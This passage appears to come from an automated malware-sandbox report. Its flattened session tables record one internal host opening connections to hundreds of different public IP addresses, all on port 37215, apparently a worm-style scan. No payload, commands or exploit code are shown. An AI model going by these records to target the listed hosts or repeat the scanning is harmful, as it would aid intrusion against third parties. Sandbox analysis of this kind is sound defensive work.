                                              17956192.168.2.1541626181.55.208.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17957192.168.2.1535264222.94.162.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17958192.168.2.154649831.199.71.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17959192.168.2.1533890121.90.179.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17960192.168.2.1542466121.101.187.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17961192.168.2.1545076157.147.36.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17962192.168.2.1535550190.246.27.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17963192.168.2.1543878222.230.61.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17964192.168.2.1537980102.77.248.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17965192.168.2.1541874222.220.139.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17966192.168.2.155721245.9.180.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17967192.168.2.1535150222.90.27.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17968192.168.2.153593094.153.118.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17969192.168.2.154512245.24.19.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17970192.168.2.1543308181.170.140.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17971192.168.2.155891837.33.213.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17972192.168.2.1557654137.84.234.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17973192.168.2.1541332102.252.117.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17974192.168.2.154934437.90.19.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17975192.168.2.155282041.72.167.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17976192.168.2.1557844122.217.36.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17977192.168.2.1557022102.109.2.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17978192.168.2.1551146121.80.107.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17979192.168.2.1533902222.228.181.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17980192.168.2.154178441.248.158.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17981192.168.2.1554546186.108.0.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17982192.168.2.1543556122.1.245.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17983192.168.2.1548130157.218.107.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17984192.168.2.1549330121.88.47.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17985192.168.2.1537622138.161.86.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17986192.168.2.1555464222.77.181.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17987192.168.2.1548066156.52.206.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17988192.168.2.1545624102.151.192.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17989192.168.2.155005845.194.79.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17990192.168.2.1534608197.240.127.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17991192.168.2.155829237.147.110.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17992192.168.2.153281245.255.85.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17993192.168.2.1533972181.23.207.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17994192.168.2.1554298186.249.228.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17995192.168.2.154258820.225.114.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17996192.168.2.1541640197.78.35.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17997192.168.2.1535278157.184.167.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17998192.168.2.1551150138.48.163.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17999192.168.2.1545464102.94.61.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18000192.168.2.153891041.33.93.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18001192.168.2.1555712186.73.145.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18002192.168.2.155658237.153.112.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18003192.168.2.1545322102.132.161.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18004192.168.2.1551578181.137.46.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18005192.168.2.1539200102.185.181.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18006192.168.2.1558832122.107.20.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18007192.168.2.1550352157.230.7.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18008192.168.2.1557056186.234.18.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18009192.168.2.154720831.180.201.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18010192.168.2.1537088156.112.167.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18011192.168.2.1538262102.37.94.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18012192.168.2.1541148138.108.115.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18013192.168.2.1537550102.222.202.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18014192.168.2.1547272121.194.74.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18015192.168.2.1550298157.92.72.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18016192.168.2.1541578121.224.147.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18017192.168.2.1533714181.31.146.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18018192.168.2.154080631.106.43.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18019192.168.2.1548370181.147.167.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18020192.168.2.1537290190.84.106.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18021192.168.2.155456437.0.228.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18022192.168.2.1547840197.248.253.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18023192.168.2.1547666222.216.25.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18024192.168.2.1552048122.221.223.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18025192.168.2.1539944122.158.88.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18026192.168.2.1541578121.210.171.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18027192.168.2.1560576181.215.186.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18028192.168.2.153285641.24.211.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18029192.168.2.1559344197.61.244.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18030192.168.2.1538860122.139.108.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18031192.168.2.1535894157.169.97.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18032192.168.2.1556704156.194.138.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18033192.168.2.1550802122.45.151.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18034192.168.2.154183694.147.6.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18035192.168.2.1550928156.220.165.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18036192.168.2.154631437.77.85.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18037192.168.2.154141441.66.110.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18038192.168.2.153508631.60.34.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18039192.168.2.1560824197.250.141.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18040192.168.2.1560458197.223.0.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18041192.168.2.154205841.166.40.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18042192.168.2.1544928181.191.232.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18043192.168.2.1533246181.221.57.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18044192.168.2.1546446181.94.19.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18045192.168.2.1542188138.73.100.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18046192.168.2.1552588102.77.12.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18047192.168.2.1537612122.230.75.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18048192.168.2.1553614102.106.208.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18049192.168.2.1549182121.51.164.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18050192.168.2.154972245.132.235.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18051192.168.2.1551320157.30.84.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18052192.168.2.1539960156.137.232.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18053192.168.2.1550172190.121.85.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18054192.168.2.1540936197.158.109.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18055192.168.2.1542694181.120.134.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18056192.168.2.1541788102.53.48.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18057192.168.2.154874645.227.91.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18058192.168.2.1535140122.107.133.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18059192.168.2.1546476138.126.236.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18060192.168.2.1545082106.139.33.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18061192.168.2.1534134121.71.209.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18062192.168.2.1535410138.4.238.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18063192.168.2.1553956157.80.115.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18064192.168.2.153707645.215.143.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18065192.168.2.1555212222.60.240.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18066192.168.2.154765231.220.24.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18067192.168.2.1557190198.211.138.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18068192.168.2.1558288122.67.76.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18069192.168.2.155105841.47.248.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18070192.168.2.1559418121.242.177.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18071192.168.2.1555064138.169.14.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18072192.168.2.1541254138.21.25.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18073192.168.2.1560516181.127.201.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18074192.168.2.153336837.112.113.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18075192.168.2.154167045.108.19.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18076192.168.2.154288841.200.11.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18077192.168.2.155118645.127.144.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18078192.168.2.1538490122.248.98.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18079192.168.2.1543222198.232.169.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18080192.168.2.154753290.132.92.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18081192.168.2.1539238122.27.2.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18082192.168.2.1547374122.81.177.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18083192.168.2.1535124157.220.36.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18084192.168.2.153986445.110.21.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18085192.168.2.1546320138.37.209.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18086192.168.2.1545138222.203.22.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18087192.168.2.1544500222.240.81.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18088192.168.2.1547440222.68.132.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18089192.168.2.155357031.141.66.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18090192.168.2.153866894.189.10.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18091192.168.2.1549592181.232.245.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18092192.168.2.1552974222.2.133.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18093192.168.2.1557394190.103.221.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18094192.168.2.1539818197.154.168.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18095192.168.2.1535118112.112.46.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18096192.168.2.1535704197.64.179.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18097192.168.2.153932631.168.154.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18098192.168.2.1551866102.43.9.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18099192.168.2.1537164186.183.173.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18100192.168.2.155540241.163.173.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18101192.168.2.1533022122.93.89.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18102192.168.2.154385037.237.222.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18103192.168.2.1537136197.52.33.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18104192.168.2.1544824102.93.58.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18105192.168.2.1550544168.197.130.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18106192.168.2.1551684122.72.200.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18107192.168.2.153508294.229.18.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18108192.168.2.1547502190.235.227.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18109192.168.2.154669637.9.135.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18110192.168.2.154548441.51.6.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18111192.168.2.1539034163.67.12.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18112192.168.2.1538314181.114.135.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18113192.168.2.1555330196.149.117.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18114192.168.2.1543542186.58.215.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18115192.168.2.1542966186.36.132.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18116192.168.2.1560660156.55.234.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18117192.168.2.153498241.126.226.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18118192.168.2.1544942197.0.159.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18119192.168.2.1546512138.133.211.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18120192.168.2.155297631.154.67.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18121192.168.2.1556430122.0.89.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18122192.168.2.1549804121.120.117.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18123192.168.2.1549026186.26.130.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18124192.168.2.154873841.158.188.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18125192.168.2.1542178197.251.167.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18126192.168.2.154642845.175.6.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18127192.168.2.1550098102.255.110.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18128192.168.2.1552518102.66.157.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18129192.168.2.1542904181.116.255.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18130192.168.2.1560314157.102.170.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18131192.168.2.1554606121.165.184.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18132192.168.2.1551036102.128.175.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18133192.168.2.1556994102.220.17.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18134192.168.2.1559256158.114.114.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18135192.168.2.154083031.244.60.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18136192.168.2.1540646181.86.232.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18137192.168.2.1547950102.48.25.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18138192.168.2.1546916156.39.23.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18139192.168.2.1555732157.175.122.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18140192.168.2.155232041.0.189.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18141192.168.2.153506637.216.127.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18142192.168.2.1536508222.53.254.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18143192.168.2.1534088190.134.77.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18144192.168.2.155587218.12.234.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18145192.168.2.1548146138.140.220.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18146192.168.2.1547024102.29.110.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18147192.168.2.155276631.149.145.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18148192.168.2.1541288157.108.21.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18149192.168.2.1542694222.99.44.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18150192.168.2.1557944197.81.39.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18151192.168.2.154155445.133.15.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18152192.168.2.1559794197.167.195.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18153192.168.2.1539594190.156.20.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18154192.168.2.1553868222.91.87.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18155192.168.2.1541304190.106.154.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18156192.168.2.153545841.23.194.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18157192.168.2.1555780222.23.121.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18158192.168.2.153882694.103.12.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18159192.168.2.1539540181.126.73.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18160192.168.2.154089845.252.247.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18161192.168.2.1559072190.29.180.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18162192.168.2.1534638122.233.50.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18163192.168.2.1534796121.231.125.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18164192.168.2.1554800222.97.42.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18165192.168.2.1541608122.42.170.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18166192.168.2.153313279.128.70.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18167192.168.2.153387645.177.110.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18168192.168.2.1534560157.100.253.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18169192.168.2.1537138122.160.204.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18170192.168.2.1536066197.147.60.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18171192.168.2.1534864157.54.182.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18172192.168.2.1541398138.175.129.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              18173192.168.2.1554604157.93.207.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
